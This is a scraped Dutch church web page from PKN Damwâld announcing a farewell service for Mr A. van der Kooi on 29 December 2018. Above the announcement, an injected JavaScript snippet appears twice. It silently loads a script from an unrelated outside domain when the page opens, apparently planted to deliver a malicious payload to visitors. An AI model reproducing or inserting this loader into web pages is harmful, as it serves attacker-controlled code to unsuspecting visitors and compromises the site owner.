;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheidsdienst van Dhr. A. van der Kooi - PKN Damwâld
zaterdag 29 december 2018
11:00 uur

Afscheidsdienst van Dhr. A. van der Kooi

Thema: Afscheidsdienst

Informatie

Voorganger:ds. Boukes
Thema:Afscheidsdienst
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie